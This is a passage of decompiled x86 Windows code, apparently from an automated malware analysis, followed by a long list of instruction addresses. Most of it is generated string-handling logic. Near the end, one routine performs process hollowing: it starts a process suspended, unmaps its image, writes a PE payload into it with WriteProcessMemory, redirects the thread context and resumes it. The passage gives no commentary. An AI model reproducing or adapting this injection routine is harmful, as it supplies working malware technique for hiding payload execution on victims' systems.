                                                                																goto L44;
                                                                															} else {
                                                                																_t418 = _v124;
                                                                																_t463 = _t463 + 1;
                                                                																_t372 = _t418;
                                                                																__eflags = _t463 - 0x1000;
                                                                																if(_t463 < 0x1000) {
                                                                																	L43:
                                                                																	_push(_t463);
                                                                																	E004186BF(_t418);
                                                                																	_t532 = _t532 + 8;
                                                                																	goto L44;
                                                                																} else {
                                                                																	_t418 =  *((intOrPtr*)(_t418 - 4));
                                                                																	_t463 = _t463 + 0x23;
                                                                																	__eflags = _t372 - _t418 + 0xfffffffc - 0x1f;
                                                                																	if(__eflags > 0) {
                                                                																		goto L61;
                                                                																	} else {
                                                                																		goto L43;
                                                                																	}
                                                                																}
                                                                															}
                                                                														} else {
                                                                															_t418 = _v88;
                                                                															_t476 = _t474 + 1;
                                                                															_t376 = _t418;
                                                                															__eflags = _t476 - 0x1000;
                                                                															if(_t476 < 0x1000) {
                                                                																L39:
                                                                																_push(_t476);
                                                                																E004186BF(_t418);
                                                                																asm("movups xmm0, [ebp-0x28]");
                                                                																_t532 = _t532 + 8;
                                                                																asm("movq xmm1, [ebp-0x78]");
                                                                																goto L40;
                                                                															} else {
                                                                																_t418 =  *((intOrPtr*)(_t418 - 4));
                                                                																_t463 = _t476 + 0x23;
                                                                																__eflags = _t376 - _t418 + 0xfffffffc - 0x1f;
                                                                																if(__eflags > 0) {
                                                                																	goto L61;
                                                                																} else {
                                                                																	goto L39;
                                                                																}
                                                                															}
                                                                														}
                                                                													}
                                                                												} else {
                                                                													__eflags = _t490 - 0x10;
                                                                													_t418 =  >=  ? _t506 :  &_v64;
                                                                													_t380 = E00417E80(_t418, _v48, "1", 1);
                                                                													_t532 = _t532 + 8;
                                                                													__eflags = _t380;
                                                                													if(_t380 != 0) {
                                                                														goto L35;
                                                                													} else {
                                                                														__eflags = _t490 - 0x10;
                                                                														_t418 =  >=  ? _t506 :  &_v64;
                                                                														_t381 = E00417E80(_t418, _v48, "2", 1);
                                                                														_t532 = _t532 + 8;
                                                                														__eflags = _t381;
                                                                														if(_t381 != 0) {
                                                                															goto L35;
                                                                														} else {
                                                                															__eflags = _t490 - 0x10;
                                                                															_t418 =  >=  ? _t506 :  &_v64;
                                                                															_t382 = E00417E80(_t418, _v48, "3", 1);
                                                                															_t532 = _t532 + 8;
                                                                															__eflags = _t382;
                                                                															if(_t382 != 0) {
                                                                																goto L35;
                                                                															} else {
                                                                																__eflags = _t490 - 0x10;
                                                                																_t418 =  >=  ? _t506 :  &_v64;
                                                                																_t383 = E00417E80(_t418, _v48, "4", 1);
                                                                																_t532 = _t532 + 8;
                                                                																__eflags = _t383;
                                                                																if(_t383 != 0) {
                                                                																	goto L35;
                                                                																} else {
                                                                																	__eflags = _t490 - 0x10;
                                                                																	_t418 =  >=  ? _t506 :  &_v64;
                                                                																	_t384 = E00417E80(_t418, _v48, "5", 1);
                                                                																	_t532 = _t532 + 8;
                                                                																	__eflags = _t384;
                                                                																	if(_t384 != 0) {
                                                                																		goto L35;
                                                                																	} else {
                                                                																		__eflags = _t490 - 0x10;
                                                                																		_t418 =  >=  ? _t506 :  &_v64;
                                                                																		_t385 = E00417E80(_t418, _v48, "6", 1);
                                                                																		_t532 = _t532 + 8;
                                                                																		__eflags = _t385;
                                                                																		if(_t385 != 0) {
                                                                																			goto L35;
                                                                																		} else {
                                                                																			__eflags = _t490 - 0x10;
                                                                																			_t418 =  >=  ? _t506 :  &_v64;
                                                                																			_t386 = E00417E80(_t418, _v48, "7", 1);
                                                                																			_t532 = _t532 + 8;
                                                                																			__eflags = _t386;
                                                                																			if(_t386 != 0) {
                                                                																				goto L35;
                                                                																			} else {
                                                                																				__eflags = _t490 - 0x10;
                                                                																				_t418 =  >=  ? _t506 :  &_v64;
                                                                																				_t387 = E00417E80(_t418, _v48, "8", 1);
                                                                																				_t532 = _t532 + 8;
                                                                																				__eflags = _t387;
                                                                																				if(_t387 != 0) {
                                                                																					goto L35;
                                                                																				} else {
                                                                																					_t463 = _v48;
                                                                																					__eflags = _t490 - 0x10;
                                                                																					_t418 =  >=  ? _t506 :  &_v64;
                                                                																					_t388 = E00417E80(_t418, _t463, "9", 1);
                                                                																					_t532 = _t532 + 8;
                                                                																					__eflags = _t388;
                                                                																					if(_t388 == 0) {
                                                                																						L44:
                                                                																						_v20 = 1;
                                                                																						__eflags = _t490 - 0x10;
                                                                																						if(_t490 < 0x10) {
                                                                																							L48:
                                                                																							_t275 =  *(_t396 + 0x18);
                                                                																							_t463 = _v92 + 1;
                                                                																							_v92 = _t463;
                                                                																							__eflags = _t463 - _t275;
                                                                																							if(_t463 < _t275) {
                                                                																								continue;
                                                                																							} else {
                                                                																								_t418 = _v72;
                                                                																								_t506 = _v96;
                                                                																								_t490 = _v100;
                                                                																								goto L50;
                                                                																							}
                                                                																						} else {
                                                                																							_t490 = _t490 + 1;
                                                                																							_t368 = _t506;
                                                                																							__eflags = _t490 - 0x1000;
                                                                																							if(_t490 < 0x1000) {
                                                                																								L47:
                                                                																								_push(_t490);
                                                                																								E004186BF(_t506);
                                                                																								_t532 = _t532 + 8;
                                                                																								goto L48;
                                                                																							} else {
                                                                																								_t506 =  *((intOrPtr*)(_t506 - 4));
                                                                																								_t490 = _t490 + 0x23;
                                                                																								__eflags = _t368 - _t506 + 0xfffffffc - 0x1f;
                                                                																								if(__eflags > 0) {
                                                                																									L61:
                                                                																									E0041CD1C(_t396, _t418, _t463, _t490, __eflags);
                                                                																									asm("int3");
                                                                																									asm("int3");
                                                                																									asm("int3");
                                                                																									_push(_t517);
                                                                																									_t518 = _t532;
                                                                																									_push(0xffffffff);
                                                                																									_push(0x4298a9);
                                                                																									_push( *[fs:0x0]);
                                                                																									_t533 = _t532 - 0x38;
                                                                																									_push(_t506);
                                                                																									_push(_t490);
                                                                																									_t279 =  *0x439008; // 0x2f6e538a
                                                                																									_push(_t279 ^ _t518);
                                                                																									 *[fs:0x0] =  &_v272;
                                                                																									_t507 = _t463;
                                                                																									_t491 = _t418;
                                                                																									_v276 = _t491;
                                                                																									_v276 = _t491;
                                                                																									_t419 = _t507;
                                                                																									_v356.dwYSize = 0;
                                                                																									__eflags =  *((intOrPtr*)(_t507 + 0x14)) - 0x10;
                                                                																									if( *((intOrPtr*)(_t507 + 0x14)) >= 0x10) {
                                                                																										_t419 =  *_t507;
                                                                																									}
                                                                																									_push(_v36);
                                                                																									_t464 =  *((intOrPtr*)(_t507 + 0x10));
                                                                																									_push(2);
                                                                																									_t282 = E00417660(_t396, _t419,  *((intOrPtr*)(_t507 + 0x10)), _t491, _t507);
                                                                																									_t535 = _t533 - 8 + 0x10;
                                                                																									__eflags = _t282 - 0xffffffff;
                                                                																									if(_t282 != 0xffffffff) {
                                                                																										__eflags =  *((intOrPtr*)(_t507 + 0x10)) - _t282;
                                                                																										_v44 = 0;
                                                                																										_t283 =  <  ?  *((void*)(_t507 + 0x10)) : _t282;
                                                                																										__eflags =  *((intOrPtr*)(_t507 + 0x14)) - 0x10;
                                                                																										_v40 = 0xf;
                                                                																										_v60 = 0;
                                                                																										if( *((intOrPtr*)(_t507 + 0x14)) >= 0x10) {
                                                                																											_t507 =  *_t507;
                                                                																										}
                                                                																										_push(_t283);
                                                                																										E00417040( &_v60, _t464, _t507);
                                                                																										_t421 =  &_v60;
                                                                																										_t285 = 0xa;
                                                                																									} else {
                                                                																										_push(0);
                                                                																										_v68 = 0;
                                                                																										_v64 = 0xf;
                                                                																										_v84 = 0;
                                                                																										E00417040( &_v84, _t464, 0x43432b);
                                                                																										_t421 =  &_v84;
                                                                																										_t285 = 1;
                                                                																									}
                                                                																									asm("movups xmm0, [ecx]");
                                                                																									 *(_t491 + 0x10) = 0;
                                                                																									_t286 = _t285 | 0x00000004;
                                                                																									 *(_t491 + 0x14) = 0;
                                                                																									asm("movups [edi], xmm0");
                                                                																									asm("movq xmm0, [ecx+0x10]");
                                                                																									asm("movq [edi+0x10], xmm0");
                                                                																									 *(_t421 + 0x10) = 0;
                                                                																									 *((intOrPtr*)(_t421 + 0x14)) = 0xf;
                                                                																									 *_t421 = 0;
                                                                																									__eflags = _t286 & 0x00000002;
                                                                																									if((_t286 & 0x00000002) == 0) {
                                                                																										L74:
                                                                																										__eflags = _t286 & 0x00000001;
                                                                																										if((_t286 & 0x00000001) == 0) {
                                                                																											L79:
                                                                																											 *[fs:0x0] = _v32;
                                                                																											return _t491;
                                                                																										} else {
                                                                																											_t465 = _v64;
                                                                																											__eflags = _t465 - 0x10;
                                                                																											if(_t465 < 0x10) {
                                                                																												goto L79;
                                                                																											} else {
                                                                																												_t424 = _v84;
                                                                																												_t466 = _t465 + 1;
                                                                																												_t288 = _t424;
                                                                																												__eflags = _t466 - 0x1000;
                                                                																												if(_t466 < 0x1000) {
                                                                																													L78:
                                                                																													_push(_t466);
                                                                																													E004186BF(_t424);
                                                                																													goto L79;
                                                                																												} else {
                                                                																													_t424 =  *(_t424 - 4);
                                                                																													_t466 =  &(_t466[0x11]);
                                                                																													__eflags = _t288 - _t424 + 0xfffffffc - 0x1f;
                                                                																													if(__eflags > 0) {
                                                                																														goto L80;
                                                                																													} else {
                                                                																														goto L78;
                                                                																													}
                                                                																												}
                                                                																											}
                                                                																										}
                                                                																									} else {
                                                                																										_t467 = _v40;
                                                                																										_t286 = _t286 & 0xfffffffd;
                                                                																										_v36 = _t286;
                                                                																										__eflags = _t467 - 0x10;
                                                                																										if(_t467 < 0x10) {
                                                                																											goto L74;
                                                                																										} else {
                                                                																											_t433 = _v60;
                                                                																											_t468 =  &(_t467[0]);
                                                                																											_t334 = _t433;
                                                                																											__eflags = _t468 - 0x1000;
                                                                																											if(_t468 < 0x1000) {
                                                                																												L73:
                                                                																												_push(_t468);
                                                                																												E004186BF(_t433);
                                                                																												_t286 = _v36;
                                                                																												_t535 = _t535 + 8;
                                                                																												goto L74;
                                                                																											} else {
                                                                																												_t424 =  *(_t433 - 4);
                                                                																												_t466 =  &(_t468[0x11]);
                                                                																												__eflags = _t334 - _t424 + 0xfffffffc - 0x1f;
                                                                																												if(__eflags > 0) {
                                                                																													L80:
                                                                																													E0041CD1C(_t396, _t424, _t466, _t491, __eflags);
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													asm("int3");
                                                                																													_push(_t518);
                                                                																													_t520 = _t535;
                                                                																													_t293 =  *0x439008; // 0x2f6e538a
                                                                																													_v356.lpReserved = _t293 ^ _t520;
                                                                																													_push(_t396);
                                                                																													_push(_t507);
                                                                																													_push(_t491);
                                                                																													_t509 = _t424;
                                                                																													GetModuleFileNameA(0,  &_v612, 0x104);
                                                                																													__eflags =  *_t509 - 0x5a4d;
                                                                																													if( *_t509 != 0x5a4d) {
                                                                																														L93:
                                                                																														VirtualFree(_t509, 0, 0x8000);
                                                                																														__eflags = _v28 ^ _t520;
                                                                																														return E00418232(_v28 ^ _t520);
                                                                																													} else {
                                                                																														_t495 =  *((intOrPtr*)(_t509 + 0x3c)) + _t509;
                                                                																														__eflags =  *_t495 - 0x4550;
                                                                																														if( *_t495 != 0x4550) {
                                                                																															goto L93;
                                                                																														} else {
                                                                																															E00419710(_t495,  &_v356, 0, 0x44);
                                                                																															asm("xorps xmm0, xmm0");
                                                                																															asm("movups [ebp-0x160], xmm0");
                                                                																															_t305 = CreateProcessA( &_v288, 0, 0, 0, 0, 4, 0, 0,  &_v356,  &_v376);
                                                                																															__eflags = _t305;
                                                                																															if(_t305 == 0) {
                                                                																																goto L93;
                                                                																															} else {
                                                                																																_t398 = VirtualAlloc(0, 4, 0x1000, 4);
                                                                																																_v388 = _t398;
                                                                																																_t398->ContextFlags = 0x10007;
                                                                																																_t307 = GetThreadContext(_v376.hThread, _t398);
                                                                																																__eflags = _t307;
                                                                																																if(_t307 == 0) {
                                                                																																	goto L93;
                                                                																																} else {
                                                                																																	ReadProcessMemory(_v376.hProcess, "   ",  &_v360, 4, 0);
                                                                																																	_t310 =  *(_t495 + 0x34);
                                                                																																	__eflags = _v360 - _t310;
                                                                																																	if(_v360 == _t310) {
                                                                																																		_t332 = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                                                																																		 *_t332(_v376.hProcess, _v360);
                                                                																																		_t310 =  *(_t495 + 0x34);
                                                                																																	}
                                                                																																	_t311 = VirtualAllocEx(_v376.hProcess, _t310,  *(_t495 + 0x50), 0x3000, 0x40);
                                                                																																	_v384 = _t311;
                                                                																																	__eflags = _t311;
                                                                																																	if(_t311 == 0) {
                                                                																																		goto L93;
                                                                																																	} else {
                                                                																																		WriteProcessMemory(_v376.hProcess, _t311, _t509,  *(_t495 + 0x54), 0);
                                                                																																		_v380 = 0;
                                                                																																		__eflags = 0 -  *(_t495 + 6);
                                                                																																		if(0 <  *(_t495 + 6)) {
                                                                																																			_t400 = 0;
                                                                																																			__eflags = 0;
                                                                																																			do {
                                                                																																				WriteProcessMemory(_v376.hProcess,  *((intOrPtr*)(_t400 + _t509 +  *((intOrPtr*)(_t509 + 0x3c)) + 0x104)) + _v384,  *((intOrPtr*)(_t400 + _t509 +  *((intOrPtr*)(_t509 + 0x3c)) + 0x10c)) + _t509,  *(_t400 + _t509 +  *((intOrPtr*)(_t509 + 0x3c)) + 0x108), 0);
                                                                																																				_t400 = _t400 + 0x28;
                                                                																																				_t432 = _v380 + 1;
                                                                																																				_v380 = _t432;
                                                                																																				__eflags = _t432 - ( *(_t495 + 6) & 0x0000ffff);
                                                                																																			} while (_t432 < ( *(_t495 + 6) & 0x0000ffff));
                                                                																																			_t398 = _v388;
                                                                																																		}
                                                                																																		WriteProcessMemory(_v376, _t398->Ebx + 8, _t495 + 0x34, 4, 0);
                                                                																																		_t398->Eax =  *((intOrPtr*)(_t495 + 0x28)) + _v384;
                                                                																																		SetThreadContext(_v376.hThread, _t398);
                                                                																																		ResumeThread(_v376.hThread);
                                                                																																		VirtualFree(_t509, 0, 0x8000);
                                                                																																		__eflags = _v28 ^ _t520;
                                                                																																		return E00418232(_v28 ^ _t520);
                                                                																																	}
                                                                																																}
                                                                																															}
                                                                																														}
                                                                																													}
                                                                																												} else {
                                                                																													goto L73;
                                                                																												}
                                                                																											}
                                                                																										}
                                                                																									}
                                                                																								} else {
                                                                																									goto L47;
                                                                																								}
                                                                																							}
                                                                																						}
                                                                																					} else {
                                                                																						goto L35;
                                                                																					}
                                                                																				}
                                                                																			}
                                                                																		}
                                                                																	}
                                                                																}
                                                                															}
                                                                														}
                                                                													}
                                                                												}
                                                                												goto L94;
                                                                											}
                                                                											L60:
                                                                											E00417180(_t418, _t463, __eflags);
                                                                											goto L61;
                                                                										}
                                                                									} else {
                                                                										goto L17;
                                                                									}
                                                                								}
                                                                							}
                                                                						}
                                                                					}
                                                                				}
                                                                				L94:
                                                                			}























































































































































                                                                0x004037d0
                                                                0x004037d1
                                                                0x004037d3
                                                                0x004037d5
                                                                0x004037e0
                                                                0x004037e1
                                                                0x004037e4
                                                                0x004037e9
                                                                0x004037eb
                                                                0x004037ee
                                                                0x004037ef
                                                                0x004037f0
                                                                0x004037f1
                                                                0x004037f5
                                                                0x004037fb
                                                                0x004037fe
                                                                0x00403804
                                                                0x0040380d
                                                                0x00403811
                                                                0x00403818
                                                                0x0040381f
                                                                0x00403822
                                                                0x0040383a
                                                                0x00403843
                                                                0x00403848
                                                                0x0040384a
                                                                0x0040384f
                                                                0x004039c2
                                                                0x004039ce
                                                                0x004039d6
                                                                0x004039e0
                                                                0x004039e5
                                                                0x00000000
                                                                0x00403855
                                                                0x00403858
                                                                0x0040385f
                                                                0x0040386b
                                                                0x0040387f
                                                                0x0040388c
                                                                0x00403892
                                                                0x00403897
                                                                0x00000000
                                                                0x004038c4
                                                                0x004038c4
                                                                0x004038c9
                                                                0x004038d1
                                                                0x00000000
                                                                0x004038d7
                                                                0x004038d7
                                                                0x004038da
                                                                0x004038dc
                                                                0x004038dc
                                                                0x004038e0
                                                                0x004038e0
                                                                0x004038e3
                                                                0x004038e6
                                                                0x004038e6
                                                                0x004038ed
                                                                0x004038f0
                                                                0x004038f5
                                                                0x004038f8
                                                                0x004038fb
                                                                0x00403900
                                                                0x00403904
                                                                0x00403906
                                                                0x00403909
                                                                0x00403910
                                                                0x00403913
                                                                0x00403916
                                                                0x00403919
                                                                0x0040391e
                                                                0x0040391e
                                                                0x00403910
                                                                0x00403928
                                                                0x0040392a
                                                                0x00403931
                                                                0x00403938
                                                                0x0040393c
                                                                0x0040393c
                                                                0x00403940
                                                                0x00403940
                                                                0x00403942
                                                                0x00403943
                                                                0x00403949
                                                                0x0040394e
                                                                0x00403953
                                                                0x00403959
                                                                0x00403968
                                                                0x00403970
                                                                0x00403971
                                                                0x00403977
                                                                0x0040397e
                                                                0x00403986
                                                                0x00403989
                                                                0x0040398e
                                                                0x00403994
                                                                0x004039be
                                                                0x004039eb
                                                                0x004039ee
                                                                0x00403a06
                                                                0x00403996
                                                                0x00403996
                                                                0x00403999
                                                                0x0040399a
                                                                0x004039a2
                                                                0x004039b4
                                                                0x004039b4
                                                                0x004039b6
                                                                0x00000000
                                                                0x004039a4
                                                                0x004039a4
                                                                0x004039a7
                                                                0x004039b2
                                                                0x00403a07
                                                                0x00403a0c
                                                                0x00403a0d
                                                                0x00403a0e
                                                                0x00403a0f
                                                                0x00403a10
                                                                0x00403a11
                                                                0x00403a19
                                                                0x00403a1c
                                                                0x00403a20
                                                                0x00403a24
                                                                0x00403a26
                                                                0x00403a28
                                                                0x00403a33
                                                                0x00403a34
                                                                0x00403a35
                                                                0x00403a38
                                                                0x00403a3d
                                                                0x00403a3f
                                                                0x00403a42
                                                                0x00403a43
                                                                0x00403a44
                                                                0x00403a48
                                                                0x00403a4e
                                                                0x00403a50
                                                                0x00403a53
                                                                0x00403a55
                                                                0x00403a58
                                                                0x00403a5b
                                                                0x00403a5e
                                                                0x00403a65
                                                                0x00403a67
                                                                0x00403a6a
                                                                0x00403a71
                                                                0x00403a74
                                                                0x00403a78
                                                                0x00403a7a
                                                                0x00403a7d
                                                                0x00403a80
                                                                0x00403a82
                                                                0x00403d6a
                                                                0x00403d6a
                                                                0x00403d71
                                                                0x00403d78
                                                                0x00403d7b
                                                                0x00403d7e
                                                                0x00000000
                                                                0x00403d84
                                                                0x00403d84
                                                                0x00403d84
                                                                0x00403d89
                                                                0x00403d8b
                                                                0x00403d8e
                                                                0x00403d95
                                                                0x00403d99
                                                                0x00403d9a
                                                                0x00403d9e
                                                                0x00403da3
                                                                0x00403da6
                                                                0x00403da9
                                                                0x00403dd3
                                                                0x00403dd3
                                                                0x00403dd6
                                                                0x00403dd9
                                                                0x00403e03
                                                                0x00403e08
                                                                0x00403e15
                                                                0x00403e22
                                                                0x00403ddb
                                                                0x00403ddb
                                                                0x00403dde
                                                                0x00403ddf
                                                                0x00403de1
                                                                0x00403de7
                                                                0x00403df9
                                                                0x00403df9
                                                                0x00403dfb
                                                                0x00000000
                                                                0x00403de9
                                                                0x00403de9
                                                                0x00403dec
                                                                0x00403df4
                                                                0x00403df7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403df7
                                                                0x00403de7
                                                                0x00403dab
                                                                0x00403dab
                                                                0x00403dae
                                                                0x00403daf
                                                                0x00403db1
                                                                0x00403db7
                                                                0x00403dc9
                                                                0x00403dc9
                                                                0x00403dcb
                                                                0x00403dd0
                                                                0x00000000
                                                                0x00403db9
                                                                0x00403db9
                                                                0x00403dbc
                                                                0x00403dc4
                                                                0x00403dc7
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403dc7
                                                                0x00403db7
                                                                0x00403da9
                                                                0x00403a90
                                                                0x00403a90
                                                                0x00403a90
                                                                0x00403a97
                                                                0x00403a9e
                                                                0x00403aa2
                                                                0x00403aa4
                                                                0x00000000
                                                                0x00000000
                                                                0x00403aaa
                                                                0x00403ab1
                                                                0x00403ab3
                                                                0x00403ab6
                                                                0x00403abd
                                                                0x00403ac1
                                                                0x00403ac2
                                                                0x00403ac8
                                                                0x00403acd
                                                                0x00403ad4
                                                                0x00403ad7
                                                                0x00403ada
                                                                0x00403ae0
                                                                0x00403aea
                                                                0x00403aef
                                                                0x00403af2
                                                                0x00403af4
                                                                0x00403c29
                                                                0x00403c29
                                                                0x00403c2c
                                                                0x00403c2f
                                                                0x00403c36
                                                                0x00403c3d
                                                                0x00403c41
                                                                0x00403c43
                                                                0x00000000
                                                                0x00403c49
                                                                0x00403c49
                                                                0x00403c50
                                                                0x00403c52
                                                                0x00403c55
                                                                0x00403c5c
                                                                0x00403c60
                                                                0x00403c61
                                                                0x00403c67
                                                                0x00403c6f
                                                                0x00403c75
                                                                0x00403c78
                                                                0x00403c7d
                                                                0x00403c80
                                                                0x00403c85
                                                                0x00403c8a
                                                                0x00403c8d
                                                                0x00403c94
                                                                0x00403c9b
                                                                0x00403c9e
                                                                0x00403ca2
                                                                0x00403ca5
                                                                0x00403cdc
                                                                0x00403cdc
                                                                0x00403ce0
                                                                0x00403ce3
                                                                0x00403ce8
                                                                0x00403cec
                                                                0x00403cef
                                                                0x00000000
                                                                0x00403cf1
                                                                0x00403cf1
                                                                0x00403cf4
                                                                0x00403cf5
                                                                0x00403cf7
                                                                0x00403cfd
                                                                0x00403d13
                                                                0x00403d13
                                                                0x00403d15
                                                                0x00403d1a
                                                                0x00000000
                                                                0x00403cff
                                                                0x00403cff
                                                                0x00403d02
                                                                0x00403d0a
                                                                0x00403d0d
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403d0d
                                                                0x00403cfd
                                                                0x00403ca7
                                                                0x00403ca7
                                                                0x00403caa
                                                                0x00403cab
                                                                0x00403cad
                                                                0x00403cb3
                                                                0x00403cc9
                                                                0x00403cc9
                                                                0x00403ccb
                                                                0x00403cd0
                                                                0x00403cd4
                                                                0x00403cd7
                                                                0x00000000
                                                                0x00403cb5
                                                                0x00403cb5
                                                                0x00403cb8
                                                                0x00403cc0
                                                                0x00403cc3
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403cc3
                                                                0x00403cb3
                                                                0x00403ca5
                                                                0x00403afa
                                                                0x00403b00
                                                                0x00403b05
                                                                0x00403b0d
                                                                0x00403b12
                                                                0x00403b15
                                                                0x00403b17
                                                                0x00000000
                                                                0x00403b1d
                                                                0x00403b23
                                                                0x00403b28
                                                                0x00403b30
                                                                0x00403b35
                                                                0x00403b38
                                                                0x00403b3a
                                                                0x00000000
                                                                0x00403b40
                                                                0x00403b46
                                                                0x00403b4b
                                                                0x00403b53
                                                                0x00403b58
                                                                0x00403b5b
                                                                0x00403b5d
                                                                0x00000000
                                                                0x00403b63
                                                                0x00403b69
                                                                0x00403b6e
                                                                0x00403b76
                                                                0x00403b7b
                                                                0x00403b7e
                                                                0x00403b80
                                                                0x00000000
                                                                0x00403b86
                                                                0x00403b8c
                                                                0x00403b91
                                                                0x00403b99
                                                                0x00403b9e
                                                                0x00403ba1
                                                                0x00403ba3
                                                                0x00000000
                                                                0x00403ba9
                                                                0x00403baf
                                                                0x00403bb4
                                                                0x00403bbc
                                                                0x00403bc1
                                                                0x00403bc4
                                                                0x00403bc6
                                                                0x00000000
                                                                0x00403bc8
                                                                0x00403bce
                                                                0x00403bd3
                                                                0x00403bdb
                                                                0x00403be0
                                                                0x00403be3
                                                                0x00403be5
                                                                0x00000000
                                                                0x00403be7
                                                                0x00403bed
                                                                0x00403bf2
                                                                0x00403bfa
                                                                0x00403bff
                                                                0x00403c02
                                                                0x00403c04
                                                                0x00000000
                                                                0x00403c06
                                                                0x00403c06
                                                                0x00403c0c
                                                                0x00403c11
                                                                0x00403c19
                                                                0x00403c1e
                                                                0x00403c21
                                                                0x00403c23
                                                                0x00403d1d
                                                                0x00403d1d
                                                                0x00403d21
                                                                0x00403d24
                                                                0x00403d4f
                                                                0x00403d52
                                                                0x00403d55
                                                                0x00403d56
                                                                0x00403d59
                                                                0x00403d5b
                                                                0x00000000
                                                                0x00403d61
                                                                0x00403d61
                                                                0x00403d64
                                                                0x00403d67
                                                                0x00000000
                                                                0x00403d67
                                                                0x00403d26
                                                                0x00403d26
                                                                0x00403d27
                                                                0x00403d29
                                                                0x00403d2f
                                                                0x00403d45
                                                                0x00403d45
                                                                0x00403d47
                                                                0x00403d4c
                                                                0x00000000
                                                                0x00403d31
                                                                0x00403d31
                                                                0x00403d34
                                                                0x00403d3c
                                                                0x00403d3f
                                                                0x00403e28
                                                                0x00403e28
                                                                0x00403e2d
                                                                0x00403e2e
                                                                0x00403e2f
                                                                0x00403e30
                                                                0x00403e31
                                                                0x00403e33
                                                                0x00403e35
                                                                0x00403e40
                                                                0x00403e41
                                                                0x00403e44
                                                                0x00403e45
                                                                0x00403e46
                                                                0x00403e4d
                                                                0x00403e51
                                                                0x00403e57
                                                                0x00403e59
                                                                0x00403e5b
                                                                0x00403e5e
                                                                0x00403e61
                                                                0x00403e63
                                                                0x00403e6a
                                                                0x00403e6e
                                                                0x00403e70
                                                                0x00403e70
                                                                0x00403e72
                                                                0x00403e75
                                                                0x00403e78
                                                                0x00403e7d
                                                                0x00403e82
                                                                0x00403e85
                                                                0x00403e88
                                                                0x00403eb5
                                                                0x00403eb8
                                                                0x00403ebf
                                                                0x00403ec3
                                                                0x00403ec7
                                                                0x00403ece
                                                                0x00403ed2
                                                                0x00403ed4
                                                                0x00403ed4
                                                                0x00403ed6
                                                                0x00403edb
                                                                0x00403ee0
                                                                0x00403ee3
                                                                0x00403e8a
                                                                0x00403e8a
                                                                0x00403e94
                                                                0x00403e9b
                                                                0x00403ea2
                                                                0x00403ea6
                                                                0x00403eab
                                                                0x00403eae
                                                                0x00403eae
                                                                0x00403ee8
                                                                0x00403eeb
                                                                0x00403ef2
                                                                0x00403ef5
                                                                0x00403efc
                                                                0x00403eff
                                                                0x00403f04
                                                                0x00403f09
                                                                0x00403f10
                                                                0x00403f17
                                                                0x00403f1a
                                                                0x00403f1c
                                                                0x00403f57
                                                                0x00403f57
                                                                0x00403f59
                                                                0x00403f8b
                                                                0x00403f90
                                                                0x00403f9d
                                                                0x00403f5b
                                                                0x00403f5b
                                                                0x00403f5e
                                                                0x00403f61
                                                                0x00000000
                                                                0x00403f63
                                                                0x00403f63
                                                                0x00403f66
                                                                0x00403f67
                                                                0x00403f69
                                                                0x00403f6f
                                                                0x00403f81
                                                                0x00403f81
                                                                0x00403f83
                                                                0x00000000
                                                                0x00403f71
                                                                0x00403f71
                                                                0x00403f74
                                                                0x00403f7c
                                                                0x00403f7f
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403f7f
                                                                0x00403f6f
                                                                0x00403f61
                                                                0x00403f1e
                                                                0x00403f1e
                                                                0x00403f21
                                                                0x00403f24
                                                                0x00403f27
                                                                0x00403f2a
                                                                0x00000000
                                                                0x00403f2c
                                                                0x00403f2c
                                                                0x00403f2f
                                                                0x00403f30
                                                                0x00403f32
                                                                0x00403f38
                                                                0x00403f4a
                                                                0x00403f4a
                                                                0x00403f4c
                                                                0x00403f51
                                                                0x00403f54
                                                                0x00000000
                                                                0x00403f3a
                                                                0x00403f3a
                                                                0x00403f3d
                                                                0x00403f45
                                                                0x00403f48
                                                                0x00403f9e
                                                                0x00403f9e
                                                                0x00403fa3
                                                                0x00403fa4
                                                                0x00403fa5
                                                                0x00403fa6
                                                                0x00403fa7
                                                                0x00403fa8
                                                                0x00403fa9
                                                                0x00403faa
                                                                0x00403fab
                                                                0x00403fac
                                                                0x00403fad
                                                                0x00403fae
                                                                0x00403faf
                                                                0x00403fb0
                                                                0x00403fb1
                                                                0x00403fb9
                                                                0x00403fc0
                                                                0x00403fc3
                                                                0x00403fc4
                                                                0x00403fc5
                                                                0x00403fd1
                                                                0x00403fd6
                                                                0x00403fe1
                                                                0x00403fe4
                                                                0x004041cd
                                                                0x004041d5
                                                                0x004041e0
                                                                0x004041eb
                                                                0x00403fea
                                                                0x00403fed
                                                                0x00403fef
                                                                0x00403ff5
                                                                0x00000000
                                                                0x00403ffb
                                                                0x00404006
                                                                0x00404014
                                                                0x00404017
                                                                0x0040403b
                                                                0x00404041
                                                                0x00404043
                                                                0x00000000
                                                                0x00404049
                                                                0x0040405a
                                                                0x0040405d
                                                                0x00404063
                                                                0x0040406f
                                                                0x00404075
                                                                0x00404077
                                                                0x00000000
                                                                0x0040407d
                                                                0x00404093
                                                                0x00404099
                                                                0x0040409c
                                                                0x004040a2
                                                                0x004040b5
                                                                0x004040c7
                                                                0x004040c9
                                                                0x004040c9
                                                                0x004040dd
                                                                0x004040e3
                                                                0x004040e9
                                                                0x004040eb
                                                                0x00000000
                                                                0x004040f1
                                                                0x004040fe
                                                                0x00404106
                                                                0x00404110
                                                                0x00404114
                                                                0x00404116
                                                                0x00404116
                                                                0x00404118
                                                                0x00404142
                                                                0x0040414e
                                                                0x00404155
                                                                0x00404156
                                                                0x0040415c
                                                                0x0040415c
                                                                0x00404160
                                                                0x00404160
                                                                0x0040417e
                                                                0x0040418e
                                                                0x0040419a
                                                                0x004041a6
                                                                0x004041b4
                                                                0x004041c2
                                                                0x004041cc
                                                                0x004041cc
                                                                0x004040eb
                                                                0x00404077
                                                                0x00404043
                                                                0x00403ff5
                                                                0x00000000
                                                                0x00000000
                                                                0x00000000
                                                                0x00403f48
                                                                0x00403f38
                                                                0x00403f2a
                                                                0x00000000
                                                                0x00000000
